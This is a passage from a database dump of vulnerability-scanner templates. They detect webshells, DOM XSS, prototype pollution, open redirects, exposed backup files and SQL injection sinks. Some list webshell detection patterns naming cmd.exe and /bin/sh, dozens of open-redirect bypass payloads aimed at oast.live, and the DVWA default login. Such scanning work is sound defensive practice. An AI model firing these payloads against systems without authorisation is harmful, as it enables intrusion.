name: sqli\n regex:\n - 'cursor\\.execute'\n - 'sqlite3\\.execute'\n - 'MySQLdb\\.execute'\n - 'psycopg2\\.execute'\n - 'cx_Oracle\\.execute'\n\n# digest: 4a0a00473045022100d5b183fba0418cf56693190a2b1b1112a53d5b2584f31c07241959a209caafac02200f7da04a1708afc23df42188fcae13c0efae39881a4179b4ecec77ce2e9843c7:922c64590222798bb761d5b6d8e72950\n", "hash": "96427816c89ee3626b929adbaa4ec07b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df2" }, "name": "url-extension-inspector.yaml", "content": "id: url-extension-inspector\n\ninfo:\n name: URL Extension Inspector\n author: ayadim\n severity: unknown\n description: |\n This template assists you in discovering intriguing extensions within a list of URLs.\n reference:\n - https://github.com/CYS4srl/CYS4-SensitiveDiscoverer/\n tags: file,url-analyse,urls,extension\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: Hot finding\n regex:\n - \"(?i)(htdocs|www|html|web|webapps|public|public_html|uploads|website|api|test|app|backup|bin|bak|old|release|sql)\\\\.(7z|bz2|gz|lz|rar|tar\\\\.gz|tar\\\\.bz2|xz|zip|z)\"\n\n - type: regex\n name: Backup file\n regex:\n - \"(?i)(\\\\.bak|\\\\.backup|\\\\.bkp|\\\\._bkp|\\\\.bk|\\\\.BAK)('|\\\")\"\n\n - type: regex\n name: PHP Source\n regex:\n - \"(?i)(\\\\.php)(\\\\.~|\\\\.bk|\\\\.bak|\\\\.bkp|\\\\.BAK|\\\\.swp|\\\\.swo|\\\\.swn|\\\\.tmp|\\\\.save|\\\\.old|\\\\.new|\\\\.orig|\\\\.dist|\\\\.txt|\\\\.disabled|\\\\.original|\\\\.backup|\\\\._back|\\\\._1\\\\.bak|~|!|\\\\.0|\\\\.1|\\\\.2|\\\\.3)('|\\\")\"\n\n - type: regex\n name: ASP Source\n regex:\n - \"(?i)(\\\\.asp)(\\\\.~|\\\\.bk|\\\\.bak|\\\\.bkp|\\\\.BAK|\\\\.swp|\\\\.swo|\\\\.swn|\\\\.tmp|\\\\.save|\\\\.old|\\\\.new|\\\\.orig|\\\\.dist|\\\\.txt|\\\\.disabled|\\\\.original|\\\\.backup|\\\\._back|\\\\._1\\\\.bak|~|!|\\\\.0|\\\\.1|\\\\.2|\\\\.3)('|\\\")\"\n\n - type: regex\n name: Database file\n regex:\n - \"(?i)\\\\.db|\\\\.sql('|\\\")\"\n\n - type: regex\n name: Bash script\n regex:\n - \"(?i)(\\\\.sh|\\\\.bashrc|\\\\.zshrc)('|\\\")\"\n\n - type: regex\n name: 1Password password manager database file\n regex:\n - \"(?i)\\\\.agilekeychain('|\\\")\"\n\n - type: regex\n name: ASP configuration file\n regex:\n - \"(?i)\\\\.asa('|\\\")\"\n\n - type: regex\n name: Apple Keychain database file\n regex:\n - \"(?i)\\\\.keychain('|\\\")\"\n\n - type: regex\n name: Azure service configuration schema file\n regex:\n - \"(?i)\\\\.cscfg('|\\\")\"\n\n - type: regex\n name: Compressed archive file\n regex:\n - \"(?i)(\\\\.zip|\\\\.gz|\\\\.tar|\\\\.rar|\\\\.tgz)('|\\\")\"\n\n - type: regex\n name: Configuration file\n regex:\n - \"(?i)(\\\\.ini|\\\\.config|\\\\.conf)('|\\\")\"\n\n - type: regex\n name: Day One journal file\n regex:\n - \"(?i)\\\\.dayone('|\\\")\"\n\n - type: regex\n name: Document file\n regex:\n - \"(?i)(\\\\.doc|\\\\.docx|\\\\.rtf)('|\\\")\"\n\n - type: regex\n name: GnuCash database file\n regex:\n - \"(?i)\\\\.gnucash('|\\\")\"\n\n - type: regex\n name: Include file\n regex:\n - \"(?i)\\\\.inc('|\\\")\"\n\n - type: regex\n name: XML file\n regex:\n - \"(?i)\\\\.xml('|\\\")\"\n\n - type: regex\n name: Old file\n regex:\n - \"(?i)\\\\.old('|\\\")\"\n\n - type: regex\n name: Log file\n regex:\n - \"(?i)\\\\.log('|\\\")\"\n\n - type: regex\n name: Java file\n regex:\n - \"(?i)\\\\.java('|\\\")\"\n\n - type: regex\n name: SQL dump file\n regex:\n - \"(?i)\\\\.sql('|\\\")\"\n\n - type: regex\n name: Excel file\n regex:\n - \"(?i)(\\\\.xls|\\\\.xlsx|\\\\.csv)('|\\\")\"\n\n - type: regex\n name: Certificate file\n regex:\n - \"(?i)(\\\\.cer|\\\\.crt|\\\\.p7b)('|\\\")\"\n\n - type: regex\n name: Java key storte\n regex:\n - \"(?i)\\\\.jks('|\\\")\"\n\n - type: regex\n name: KDE Wallet Manager database file\n regex:\n - \"(?i)\\\\.kwallet('|\\\")\"\n\n - type: regex\n name: Little Snitch firewall configuration file\n regex:\n - \"(?i)\\\\.xpl('|\\\")\"\n\n - type: regex\n name: Microsoft BitLocker Trusted Platform Module password file\n regex:\n - \"(?i)\\\\.tpm('|\\\")\"\n\n - type: regex\n name: Microsoft BitLocker recovery key file\n regex:\n - \"(?i)\\\\.bek('|\\\")\"\n\n - type: regex\n name: Microsoft SQL database file\n regex:\n - \"(?i)\\\\.mdf('|\\\")\"\n\n - type: regex\n name: Microsoft SQL server compact database file\n regex:\n - \"(?i)\\\\.sdf('|\\\")\"\n\n - type: regex\n name: Network traffic capture file\n regex:\n - \"(?i)\\\\.pcap('|\\\")\"\n\n - type: regex\n name: OpenVPN client configuration file\n regex:\n - \"(?i)\\\\.ovpn('|\\\")\"\n\n - type: regex\n name: PDF file\n regex:\n - \"(?i)\\\\.pdf('|\\\")\"\n\n - type: regex\n name: PHP file\n regex:\n - \"(?i)\\\\.pcap('|\\\")\"\n\n - type: regex\n name: Password Safe database file\n regex:\n - \"(?i)\\\\.psafe3('|\\\")\"\n\n - type: regex\n name: Potential configuration file\n regex:\n - \"(?i)\\\\.yml('|\\\")\"\n\n - type: regex\n name: Potential cryptographic key bundle\n regex:\n - \"(?i)(\\\\.pkcs12|\\\\.p12|\\\\.pfx|\\\\.asc|\\\\.pem)('|\\\")\"\n\n - type: regex\n name: Potential private key\n regex:\n - \"(?i)otr.private_key('|\\\")\"\n\n - type: regex\n name: Presentation file\n regex:\n - \"(?i)(\\\\.ppt|\\\\.pptx)('|\\\")\"\n\n - type: regex\n name: Python file\n regex:\n - \"(?i)\\\\.py('|\\\")\"\n\n - type: regex\n name: Remote Desktop connection file\n regex:\n - \"(?i)\\\\.rdp('|\\\")\"\n\n - type: regex\n name: Ruby On Rails file\n regex:\n - \"(?i)\\\\.rb('|\\\")\"\n\n - type: regex\n name: SQLite database file\n regex:\n - \"(?i)\\\\.sqlite|\\\\.sqlitedb('|\\\")\"\n\n - type: regex\n name: SQLite3 database file\n regex:\n - \"(?i)\\\\.sqlite3('|\\\")\"\n\n - type: regex\n name: Sequel Pro MySQL database manager bookmark file\n regex:\n - \"(?i)\\\\.plist('|\\\")\"\n\n - type: regex\n name: Shell configuration file\n regex:\n - \"(?i)(\\\\.exports|\\\\.functions|\\\\.extra)('|\\\")\"\n\n - type: regex\n name: Temporary file\n regex:\n - \"(?i)\\\\.tmp\"\n\n - type: regex\n name: Terraform variable config file\n regex:\n - \"(?i)\\\\.tfvars('|\\\")\"\n\n - type: regex\n name: Text file\n regex:\n - \"(?i)\\\\.txt('|\\\")\"\n\n - type: regex\n name: Tunnelblick VPN configuration file\n regex:\n - \"(?i)\\\\.tblk('|\\\")\"\n\n - type: regex\n name: Windows BitLocker full volume encrypted data file\n regex:\n - \"(?i)\\\\.fve('|\\\")\"\n# digest: 490a0046304402202fdd8df60e47d5428b4d97d4ba47f93898efa3684b316c3d2479f46f063495a6022061157464c0ef21307e4f8e852f5be86e0673c15f0c4a67ee24c230436e177a25:922c64590222798bb761d5b6d8e72950", "hash": "2feb8ed454bc5ab164565e286299389e", "level": 1, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df3" }, "name": "asp-webshell.yaml", "content": "id: asp-webshell\n\ninfo:\n name: ASP/ASP.NET Webshell - Detect\n author: lu4nx\n severity: high\n reference:\n - https://github.com/tennc/webshell/tree/master/aspx\n - https://github.com/tennc/webshell/tree/master/asp\n - https://www.rapid7.com/blog/post/2016/12/14/webshells-101/\n metadata:\n verified: true\n tags: asp,aspx,file,webshell\nfile:\n - extensions:\n - asp\n - asa\n - aspx\n - ashx\n - asmx\n - asax\n\n extractors:\n - type: regex\n regex:\n - '(?i)(eval)'\n - '(?i)(eval|execute)\\('\n - '(?i)wscript.shell'\n - '(?i)ExecuteStatement'\n - '(?i)cmd.exe'\n - '(?i)mmshell'\n - '(?i)GetCmd'\n\n# digest: 490a0046304402205f4df9ce77c729238615089b1cf2310f5574e15ac685df735c05f24fa9b33d5d02206ba3985dfbe3ff1ac6021c4ead721ebe24c54ebc10d32f695a6564563dcdf15b:922c64590222798bb761d5b6d8e72950\n", "hash": "c731bc6e784d72a552113be780bc47e0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df4" }, "name": "jsp-webshell.yaml", "content": "id: jsp-webshell\n\ninfo:\n name: JSP Webshell - Detect\n author: lu4nx\n severity: high\n reference:\n - https://github.com/tennc/webshell/tree/master/jsp\n - https://github.com/tennc/webshell/tree/master/jspx\n - https://www.rapid7.com/blog/post/2016/12/14/webshells-101/\n metadata:\n verified: true\n tags: jsp,java,jspx,webshell,file\nfile:\n - extensions:\n - jsp\n - java\n - jspx\n\n extractors:\n - type: regex\n regex:\n - '(?i)(ClassLoader|exec|eval|ProcessBuilder|getInputStream|loadClass|defineClass|URLClassLoader)\\('\n - '(?i)cmd.exe'\n - '(?i)/bin/sh'\n - '(?i)/bin/bash'\n - '(?i)exeCmd'\n\n# digest: 4b0a00483046022100c52ce185c59b043aaf28f5cb0e6a0ef91c7d71a5094888fd6cf1beb8778fcf36022100879fa5886ba403b3f31b9b5c0941048809eb8157d4cf191fcf06ea8fc540f836:922c64590222798bb761d5b6d8e72950\n", "hash": "5b0597a4b41ff440965a563c64a8ec02", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df5" }, "name": "php-webshell.yaml", "content": "id: php-webshell\n\ninfo:\n name: PHP Webshell - Detect\n author: lu4nx\n severity: high\n reference:\n - https://github.com/tennc/webshell/tree/master/php\n - https://www.rapid7.com/blog/post/2016/12/14/webshells-101/\n metadata:\n verified: true\n tags: php,file,webshell\nfile:\n - extensions:\n - php\n\n extractors:\n - type: regex\n regex:\n - '(?i)\\b(passthru|eval|exec|system|phpinfo|assert|call_user_func|call_user_func_array)\\('\n - '(?i)cmd.exe'\n - '(?i)/bin/sh'\n - '(?i)/bin/bash'\n - '(?i)WScript.Shell'\n - '(?i)gzuncompress\\(base64_decode\\('\n - '\\]\\(\\$_(GET|POST|COOKIE|REQUEST)\\['\n - '(?i)new\\s*(ReflectionFunction|ReflectionClass)'\n - '(?i)0x647261646e617473'\n - '65786563' # exec\n - '(?i)\\$\\w+\\(\\$_(GET|POST|COOKIE|REQUEST)'\n - '(?i)b4tm4n'\n - '(?i)cmdshell'\n\n# digest: 490a00463044022078097d3237ceb0cabb1e0b1c456f4c14b80ea66d392154a136bdb5d453a7dcca0220201d8304738ea91076d9deb51e67c381d87e8f0d953a51743fa29fbd4615963f:922c64590222798bb761d5b6d8e72950\n", "hash": "58ba31361dfc87bab3069428721db94b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df6" }, "name": "dom-invader-xss.yaml", "content": "id: dom-invader-xss\n\ninfo:\n name: DOM Invader - Cross-Site Scripting\n author: geeknik\n severity: high\n description: DOM Invader contains a cross-site scripting vulnerability in Sources & Sinks functionality.\n reference:\n - Inspired by https://portswigger.net/blog/introducing-dom-invader\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cwe-id: CWE-79\n tags: xss,file\nfile:\n - extensions:\n - js\n - ts\n - html\n - htm\n - php\n - cs\n - rb\n - py\n\n extractors:\n - type: regex\n name: sink\n part: body\n regex:\n - 'jQuery(\\.globalEval|\\.\\$|\\.constructor|\\.parseHTML|\\.has|\\.init|\\.index|\\.add|\\.append|\\.appendTo|\\.after|\\.insertAfter|\\.before|\\.insertBefore|\\.html|\\.prepend|\\.prependTo|\\.replaceWith|\\.replaceAll|\\.wrap|\\.wrapALL|\\.wrapInner|\\.prop\\.innerHTML|\\.prop\\.outerHTML|\\.attr\\.onclick|\\.attr\\.onmouseover|\\.attr.onmousedown|\\.attr\\.onmouseup|\\.attr\\.onkeydown|\\.attr\\.onkeypress|\\.attr\\.onkeyup|\\.attr\\.href|\\.attr\\.src|\\.attr\\.data|\\.attr\\.action|\\.attr\\.formaction|\\.prop\\.href|\\.prop\\.src|\\.prop\\.data|\\.prop\\.action|\\.prop\\.formaction)'\n - 'eval|Function|execScript|msSetImmediate|fetch(\\.body)?|form\\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\\.executeSql|JSON\\.parse'\n - 'fetch(\\.body)?'\n - 'history(\\.pushState|\\.replaceState)'\n - '(session|local)Storage(\\.setItem(\\.name|\\.value))'\n - 'anchor(\\.href|\\.target)'\n - 'button(\\.formaction|\\.value)'\n - 'set(Timeout|Interval|Immediate)'\n - 'script(\\.src|\\.textContent|\\.innerText|\\.innerHTML|\\.appendChild|\\.append)'\n - 'document(\\.write|\\.writeln|\\.implementation\\.createHTMLDocument|\\.domain|\\.cookie|\\.evaluate)'\n - 'element(\\.outerText|\\.innerText|\\.textContent|\\.style\\.cssText|\\.innerHTML|\\.outerHTML|\\.insertAdjacentHTML|\\.setAttribute(\\.onclick|\\.onmouseover|\\.onmousedown|\\.onmouseup|\\.onkeydown|\\.onkeypress|\\.onkeyup|\\.href|\\.src|\\.data|\\.action|\\.formaction))'\n - 'location(\\.href|\\.replace|\\.assign|\\.pathname|\\.protocol|\\.host|\\.hostname|\\.hash|\\.search)?'\n - 'iframe(\\.srcdoc|\\.src)'\n - 'xhr(\\.open|\\.send|\\.setRequestHeader(\\.name|\\.value)?)'\n\n - type: regex\n name: source\n part: body\n regex:\n - 'location(\\.href|\\.hash|\\.search|\\.pathname)?'\n - 'window\\.name'\n - 'document(\\.URL|\\.referrer|\\.documentURI|\\.baseURI|\\.cookie)'\n# digest: 490a0046304402207cb01583d1a2752ecf4e9fc678dfecec46dfa254251612555d2126e63fc7c7e002202b4d56e018e4837351900cabe41fbb26d0f23c13bfbf5387f8e2161fff66ba60:922c64590222798bb761d5b6d8e72950", "hash": "133c8046c6b59eea692e46def49d08e0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df7" }, "name": "dvwa-headless-automatic-login.yaml", "content": "id: dvwa-headless-automatic-login\n\ninfo:\n name: DVWA Headless Automatic Login\n author: pdteam\n severity: high\n tags: headless,dvwa\n\nheadless:\n - steps:\n - args:\n url: \"{{BaseURL}}/login.php\"\n action: navigate\n\n - action: waitload\n\n - args:\n by: x\n xpath: /html/body/div/div[2]/form/fieldset/input\n action: click\n\n - action: waitload\n\n - args:\n by: x\n value: admin\n xpath: /html/body/div/div[2]/form/fieldset/input\n action: text\n\n - args:\n by: x\n xpath: /html/body/div/div[2]/form/fieldset/input[2]\n action: click\n\n - action: waitload\n\n - args:\n by: x\n value: password\n xpath: /html/body/div/div[2]/form/fieldset/input[2]\n action: text\n\n - args:\n by: x\n xpath: /html/body/div/div[2]/form/fieldset/p/input\n action: click\n\n - action: waitload\n\n matchers-condition: or\n matchers:\n - part: resp\n type: word\n words:\n - \"You have logged in as\"\n\n - part: resp\n type: word\n words:\n - \"First time using DVWA\"\n# digest: 4a0a0047304502202df744e611b878bb983647874d41c8e4ad4871a8129bd7257a920809328f5172022100ec6be46e75582d1bb87e9b892e2624c3d21bfdc055194913c342dbe2c9f75856:922c64590222798bb761d5b6d8e72950", "hash": "f63f63bdd2b64727dd18b5170b69efd9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df8" }, "name": "extract-urls.yaml", "content": "id: extract-urls\n\ninfo:\n name: Extract URLs from HTML attributes\n author: dwisiswant0\n severity: info\n tags: headless,extractor\n\nheadless:\n - steps:\n - args:\n url: \"{{BaseURL}}\"\n action: navigate\n\n - action: waitload\n\n - action: script\n name: extract\n args:\n code: |\n () => {\n return '\\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\\r\\n') + '\\n'\n }\n\n extractors:\n - type: kval\n part: extract\n kval:\n - extract\n# digest: 4a0a0047304502201929be3307cd1badad321f4fce5ff44feda065bae4ab72a7817ea16fa8201afb022100be1f94a508d5d79dbff66c137c8c8959b1168743fc8bfa3f612ae4ef3210ec45:922c64590222798bb761d5b6d8e72950", "hash": "e6571f5502261b9e523b628547803acb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df9" }, "name": "headless-open-redirect.yaml", "content": "id: headless-open-redirect\n\ninfo:\n name: Open Redirect - Detect\n author: theamanrawat\n severity: medium\n description: |\n An open redirect was detected. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cwe-id: CWE-601\n tags: redirect,generic,headless\n\nheadless:\n - steps:\n - args:\n url: '{{BaseURL}}/{{redirect}}'\n action: navigate\n\n - action: waitload\n payloads:\n redirect:\n - '%09/oast.live/'\n - '%5C%5Coast.live/%252e%252e%252f'\n - '%5Coast.live'\n - '%5coast.live/%2f%2e%2e'\n - '%5c{{RootURL}}oast.live/%2f%2e%2e'\n - '../oast.live'\n - '.oast.live'\n - '/%5coast.live'\n - '////\\;@oast.live'\n - '////oast.live'\n - '///oast.live'\n - '///oast.live/%2f%2e%2e'\n - '///oast.live@//'\n - '///{{RootURL}}oast.live/%2f%2e%2e'\n - '//;@oast.live'\n - '//\\/oast.live/'\n - '//\\@oast.live'\n - '//\\oast.live'\n - '//\\toast.live/'\n - '//oast.live/%2F..'\n - '//oast.live//'\n - '//%69%6e%74%65%72%61%63%74%2e%73%68'\n - '//oast.live@//'\n - '//oast.live\\toast.live/'\n - '//https://oast.live@//'\n - '/<>//oast.live'\n - '/\\/\\/oast.live/'\n - '/\\/oast.live'\n - '/\\oast.live'\n - '/oast.live'\n - '/oast.live/%2F..'\n - '/oast.live/'\n - '/oast.live/..;/css'\n - '/https:oast.live'\n - '/{{RootURL}}oast.live/'\n - '/〱oast.live'\n - '/〵oast.live'\n - '/ゝoast.live'\n - '/ーoast.live'\n - '/ーoast.live'\n - '<>//oast.live'\n - '@oast.live'\n - '@https://oast.live'\n - '\\/\\/oast.live/'\n - 'evil%E3%80%82com'\n - 'oast.live'\n - 'oast.live/'\n - 'oast.live//'\n - 'oast.live;@'\n - 'https%3a%2f%2foast.live%2f'\n - 'https:%0a%0doast.live'\n - 'https://%0a%0doast.live'\n - 'https://%09/oast.live'\n - 'https://%2f%2f.oast.live/'\n - 'https://%3F.oast.live/'\n - 'https://%5c%5c.oast.live/'\n - 'https://%5coast.live@'\n - 'https://%23.oast.live/'\n - 'https://.oast.live'\n - 'https://////oast.live'\n - 'https:///oast.live'\n - 'https:///oast.live/%2e%2e'\n - 'https:///oast.live/%2f%2e%2e'\n - 'https:///oast.live@oast.live/%2e%2e'\n - 'https:///oast.live@oast.live/%2f%2e%2e'\n - 'https://:80#@oast.live/'\n - 'https://:80?@oast.live/'\n - 'https://:@\\@oast.live'\n - 'https://:@oast.live\\@oast.live'\n - 'https://;@oast.live'\n - 'https://\\toast.live/'\n - 'https://oast.live/oast.live'\n - 'https://oast.live/https://oast.live/'\n - 'https://www.\\.oast.live'\n - 'https:/\\/\\oast.live'\n - 'https:/\\oast.live'\n - 'https:/oast.live'\n - 'https:oast.live'\n - '{{RootURL}}oast.live'\n - '〱oast.live'\n - '〵oast.live'\n - 'ゝoast.live'\n - 'ーoast.live'\n - 'ーoast.live'\n - 'redirect/oast.live'\n - 'cgi-bin/redirect.cgi?oast.live'\n - 'out?oast.live'\n - 'login?to=http://oast.live'\n - '#/oast.live'\n - '%0a/oast.live/'\n - '%0d/oast.live/'\n - '%00/oast.live/'\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"Interactsh Server\"\n# digest: 490a0046304402206753621bcdaff325fba22dd398200a7dd47f6959b40403a98fa2f3afeb17be380220103cac0ac968c27495b35cc3a61ae6fb152dfa0f35953c3c23b3e36110d194a7:922c64590222798bb761d5b6d8e72950", "hash": "3bac0b972aa09dc232cf8cd5e8369ac6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dfa" }, "name": "postmessage-outgoing-tracker.yaml", "content": "id: postmessage-outgoing-tracker\n\ninfo:\n name: Postmessage Outgoing Tracker\n author: LogicalHunter\n severity: info\n reference:\n - https://appcheck-ng.com/html5-cross-document-messaging-vulnerabilities/\n tags: headless,postmessage\n\nheadless:\n - steps:\n - action: setheader\n args:\n part: response\n key: Content-Security-Policy\n value: \"default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;\"\n\n - action: script\n args:\n hook: true\n code: |\n () => {\n window.alerts = [];\n\n logger = found => window.alerts.push(found);\n\n function getStackTrace() {\n var stack;\n try {\n throw new Error('');\n } catch (error) {\n stack = error.stack || '';\n }\n\n stack = stack.split('\\n').map(line => line.trim());\n return stack.splice(stack[0] == 'Error' ? 2 : 1);\n }\n\n var oldSender = window.postMessage;\n\n window.postMessage = (data, origin) => {\n if (origin == '*') {\n logger({stack: getStackTrace(), args: {data, origin}});\n return oldSender.apply(this, arguments);\n }\n };\n }\n\n - args:\n url: \"{{BaseURL}}\"\n action: navigate\n - action: waitload\n\n - action: script\n name: alerts\n args:\n code: |\n () => { window.alerts }\n\n matchers:\n - type: word\n part: alerts\n words:\n - \"at window.postMessage\"\n\n extractors:\n - type: kval\n part: alerts\n kval:\n - alerts\n# digest: 4b0a0048304602210086257806d07e03db948397827002ce802d2268c9b897c1a4e71ade20b22b222202210094f84b0a083d95efd50b36f5fd9765eae6ccb657332c21af2ded2d6f754bce13:922c64590222798bb761d5b6d8e72950", "hash": "7ffd643432025f293be69cb6ef4b69e1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dfb" }, "name": "postmessage-tracker.yaml", "content": "id: postmessage-tracker\n\ninfo:\n name: Postmessage Tracker\n author: pdteam\n severity: info\n reference:\n - https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js\n tags: headless,postmessage\n\nheadless:\n - steps:\n - action: setheader\n args:\n part: response\n key: Content-Security-Policy\n value: \"default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;\"\n\n - action: script\n args:\n hook: true\n code: |\n () => {\n window.alerts = [];\n\n logger = found => window.alerts.push(found);\n\n function getStackTrace() {\n var stack;\n try {\n throw new Error('');\n } catch (error) {\n stack = error.stack || '';\n }\n\n stack = stack.split('\\n').map(line => line.trim());\n return stack.splice(stack[0] == 'Error' ? 2 : 1);\n }\n\n var oldListener = Window.prototype.addEventListener;\n\n Window.prototype.addEventListener = (type, listener, useCapture) => {\n if (type === 'message') {\n logger(getStackTrace());\n }\n return oldListener.apply(this, arguments);\n };\n }\n\n - args:\n url: \"{{BaseURL}}\"\n action: navigate\n - action: waitload\n\n - action: script\n name: alerts\n args:\n code: |\n () => { window.alerts }\n\n matchers:\n - type: word\n part: alerts\n words:\n - \"at Window.addEventListener\"\n\n extractors:\n - type: kval\n part: alerts\n kval:\n - alerts\n# digest: 490a0046304402203e9bd9f021bbf2a081ac817e6f8381e39f6507e40a22659ebed4a8402fea0d1202204f1d217045fc3577876bf20765baa2c6880a41fbf940c426dbdd2d96289e04e1:922c64590222798bb761d5b6d8e72950", "hash": "52193328f920be5a9c855127bfb94801", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dfc" }, "name": "prototype-pollution-check.yaml", "content": "id: prototype-pollution-check\n\ninfo:\n name: Prototype Pollution Check\n author: pdteam\n severity: medium\n metadata:\n max-request: 4\n tags: headless\n\nheadless:\n - steps:\n - args:\n url: \"{{BaseURL}}?constructor[prototype][vulnerableprop]=polluted#constructor[prototype][vulnerableprop]=polluted\"\n action: navigate\n\n - action: waitload\n\n - action: script\n name: extract\n args:\n code: |\n () => {\n return window.vulnerableprop\n }\n matchers:\n - type: word\n part: extract\n words:\n - \"polluted\"\n\n - steps:\n - args:\n url: \"{{BaseURL}}?constructor.prototype.vulnerableprop=polluted#constructor.prototype.vulnerableprop=polluted\"\n action: navigate\n\n - action: waitload\n\n - action: script\n name: extract2\n args:\n code: |\n () => {\n return window.vulnerableprop\n }\n matchers:\n - type: word\n part: extract2\n words:\n - \"polluted\"\n\n - steps:\n - args:\n url: \"{{BaseURL}}?__proto__[vulnerableprop]=polluted#__proto__.vulnerableprop=polluted&__proto__[vulnerableprop]=polluted\"\n action: navigate\n\n - action: waitload\n\n - action: script\n name: extract3\n args:\n code: |\n () => {\n return window.vulnerableprop\n }\n matchers:\n - type: word\n part: extract3\n words:\n - \"polluted\"\n\n - steps:\n - args:\n url: \"{{BaseURL}}?__proto__.vulnerableprop=polluted\"\n action: navigate\n\n - action: waitload\n\n - action: script\n name: extract4\n args:\n code: |\n () => {\n return window.vulnerableprop\n }\n matchers:\n - type: word\n part: extract4\n words:\n - \"polluted\"\n# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950", "hash": "30d1e771dc94e12b726d31568f6bb962", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dfd" }, "name": "screenshot.yaml", "content": "id: screenshot\n\ninfo:\n name: Headless Http Screenshot\n author: V0idC0de,righettod,tarunKoyalwar\n severity: info\n description: Takes a screenshot of the specified URLS.\n tags: headless,screenshot\n\nvariables:\n filename: '{{replace(BaseURL,\"/\",\"_\")}}'\n dir: \"screenshots\"\n\nheadless:\n - steps:\n - action: setheader\n args:\n part: request\n key: \"User-Agent\"\n value: \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:111.0) Gecko/20100101 Firefox/111.0\"\n\n - action: navigate\n args:\n url: \"{{BaseURL}}\"\n\n - action: waitload\n\n - action: screenshot\n args:\n fullpage: \"true\"\n mkdir: \"true\"\n to: \"{{dir}}/{{filename}}\"\n# digest: 4a0a0047304502202e94bb4f26333b96b0b5f2a09120b689263d739676bafd999b1318bb9e8bcc06022100bbcc54afafcc8bc7d592f01439cfdddba54c245bf35081b3a00302bc2d6d6f1c:922c64590222798bb761d5b6d8e72950", "hash": "7024a9ec5e50a024431daf42186de68f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dfe" }, "name": "window-name-domxss.yaml", "content": "id: window-name-domxss\n\ninfo:\n name: window.name - DOM Cross-Site Scripting\n author: pdteam\n severity: high\n description: The window-name is vulnerable to DOM based cross-site scripting.\n reference:\n - https://public-firing-range.appspot.com/dom/index.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cwe-id: CWE-79\n tags: headless,xss,domxss\n\nheadless:\n - steps:\n - action: setheader\n args:\n part: response\n key: Content-Security-Policy\n value: \"default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;\"\n\n - action: script\n args:\n hook: true\n code: |\n () => {\n window.alerts = [];\n\n logger = found => window.alerts.push(found);\n\n function getStackTrace() {\n var stack;\n try {\n throw new Error('');\n }\n catch (error) {\n stack = error.stack || '';\n }\n stack = stack.split('\\n').map(function (line) { return line.trim(); });\n return stack.splice(stack[0] == 'Error' ? 2 : 1);\n }\n window.name = \"{{randstr_1}}'\\\"<>\";\n\n var oldEval = eval;\n var oldDocumentWrite = document.write;\n var setter = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML').set;\n Object.defineProperty(Element.prototype, 'innerHTML', {\n set: function innerHTML_Setter(val) {\n if (val.includes(\"{{randstr_1}}'\\\"<>\")) {\n logger({sink: 'innerHTML', source: 'window.name', code: val, stack: getStackTrace()});\n }\n return setter.call(this, val)\n }\n });\n\n eval = function(data) {\n if (data.includes(\"{{randstr_1}}'\\\"<>\")) {\n logger({sink: 'eval' ,source: 'window.name', code: data, stack: getStackTrace()});\n }\n return oldEval.apply(this, arguments);\n };\n\n document.write = function(data) {\n if (data.includes(\"{{randstr_1}}'\\\"<>\")) {\n logger({sink: 'document.write' ,source: 'window.name', code: data, stack: getStackTrace()});\n }\n return oldEval.apply(this, arguments);\n };\n }\n\n - args:\n url: \"{{BaseURL}}\"\n action: navigate\n - action: waitload\n\n - action: script\n name: alerts\n args:\n code: |\n () => { window.alerts }\n\n matchers:\n - type: word\n part: alerts\n words:\n - \"sink:\"\n\n extractors:\n - type: kval\n part: alerts\n kval:\n - alerts\n# digest: 490a004630440220440ff260d9c59333dc1481acd3df4e4c68997bb43f6834f8e0dc24f522d7bbc3022038a8a9ab98ef7c71a0f749a408a2bc682fd38954282666b671651ee2df5f77c5:922c64590222798bb761d5b6d8e72950", "hash": "1a8f68439850614632c31a54a22ccd94", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dff" }, "name": "CVE-2018-25031.yaml", "content": "id: CVE-2018-25031\n\ninfo:\n name: Swagger UI < 3.38.0 - Cross-Site Scripting\n author: 